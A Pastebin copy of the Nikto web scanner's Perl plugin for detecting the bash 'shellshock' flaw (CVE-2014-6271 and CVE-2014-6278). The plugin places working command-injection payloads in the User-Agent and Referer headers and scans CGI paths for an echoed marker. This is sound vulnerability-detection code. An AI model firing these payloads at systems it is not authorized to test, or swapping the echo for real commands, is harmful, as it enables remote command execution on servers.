SHARE
TWEET

Untitled

a guest Apr 25th, 2019 69 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #VERSION,2.01
  2. ###############################################################################
  3. #  Copyright (C) 2014 Chris Sullo
  4. #
  5. #  This program is free software; you can redistribute it and/or
  6. #  modify it under the terms of the GNU General Public License
  7. #  as published by the Free Software Foundation; version 2
  8. #  of the License only.
  9. #
  10. #  This program is distributed in the hope that it will be useful,
  11. #  but WITHOUT ANY WARRANTY; without even the implied warranty of
  12. #  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  13. #  GNU General Public License for more details.
  14. #
  15. #  You should have received a copy of the GNU General Public License
  16. #  along with this program; if not, write to
  17. #  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
  18. ###############################################################################
  19. # PURPOSE:
  20. # Check for the bash 'shellshock' vulnerability
  21. ###############################################################################
  22. sub nikto_shellshock_init {
  23.     my $id = { name        => "shellshock",
  24.                full_name   => "shellshock",
  25.                author      => "sullo",
  26.                description => "Look for the bash 'shellshock' vulnerability.",
  27.                hooks       => { scan => { method => \&nikto_shellshock, weight => 20 }, },
  28.                copyright   => "2014 Chris Sullo",
  29.                options => { uri => "uri to assess", },
  30.                };
  31.  
  32.     return $id;
  33. }
  34.  
  35. sub nikto_shellshock {
  36.     my ($mark, $parameters) = @_;
  37.     my ($found, @names,);
  38.  
  39.  
  40.     # This would be better coming from live scan results and not db_variables
  41.     my @files = split(/ /, $VARIABLES{"\@SHELLSHOCK"});
  42.  
  43.     push(@files, "");
  44.     my %headers;
  45.     $headers{'User-Agent'} = '() { :; }; echo Nikto-Added-CVE-2014-6271: true;echo;echo;';
  46.     $headers{'Referer'} = '() { _; } >_[$($())] { echo Nikto-Added-CVE-2014-6278: true; echo;echo; }';
  47.     my @dirs = split(/ /, $VARIABLES{'@CGIDIRS'});
  48.     push(@dirs, "/");
  49.  
  50.     #check for FP... error in page
  51.     my $checkcontent=1;
  52.     my ($res, $content, $error, $request, $response) = nfetch($mark, "/", "GET", "", \%headers, "", "shellshock");
  53.     if ($content =~ /Nikto-Added-CVE/) {
  54.     $checkcontent=0;
  55.     nprint("Content seems to contain error headers, ignoring content match in shellshock plugin","v");
  56.     }
  57.  
  58.     if (defined $parameters->{'uri'}) {
  59.  
  60.         # request by hostname
  61.         my ($res, $content, $error, $request, $response) = nfetch($mark, "$parameters->{'uri'}", "GET", "", \%headers, "", "shellshock");
  62.         if (($response->{'nikto-added-cve-2014-6271'} eq 'true') || ($checkcontent && ($content =~ /Nikto-Added-CVE-2014-6271: true/))) {
  63.             add_vulnerability( $mark, "$parameters->{'uri'}: Site appears vulnerable to the 'shellshock' vulnerability (CVE-2014-6271).", 999949, 112004, "GET",
  64.                 "$parameters->{'uri'}", $request, $response);
  65.         }
  66.         if (($response->{'nikto-added-cve-2014-6278'} eq 'true') || ($checkcontent && ($content =~ /Nikto-Added-CVE-2014-6278: true/))) {
  67.             add_vulnerability( $mark, "$parameters->{'uri'}: Site appears vulnerable to the 'shellshock' vulnerability (CVE-2014-6278).", 999948, 112004, "GET",
  68.                 "$parameters->{'uri'}", $request, $response);
  69.         }
  70.     }
  71.     else {
  72.         foreach my $cgidir (@dirs) {
  73.             foreach my $file (@files) {
  74.                 return if $mark->{'terminate'};
  75.  
  76.                 # request by hostname
  77.                 my ($res, $content, $error, $request, $response) = nfetch($mark, "$cgidir$file", "GET", "", \%headers, "", "shellshock");
  78.                 if (($response->{'nikto-added-cve-2014-6271'} eq 'true') || ($checkcontent && ($content =~ /Nikto-Added-CVE-2014-6271: true/))) {
  79.                     add_vulnerability( $mark, "$cgidir$file: Site appears vulnerable to the 'shellshock' vulnerability (CVE-2014-6271).", 999947, 112004, "GET",
  80.                         "$cgidir$file", $request, $response);
  81.                 }
  82.                 if (($response->{'nikto-added-cve-2014-6278'} eq 'true') || ($checkcontent && ($content =~ /Nikto-Added-CVE-2014-6278: true/))) {
  83.                     add_vulnerability( $mark, "$cgidir$file: Site appears vulnerable to the 'shellshock' vulnerability (CVE-2014-6278).", 999946, 112004, "GET",
  84.                         "$cgidir$file", $request, $response);
  85.                 }
  86.             }
  87.         }
  88.     }
  89. }
  90.  
  91. 1;
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top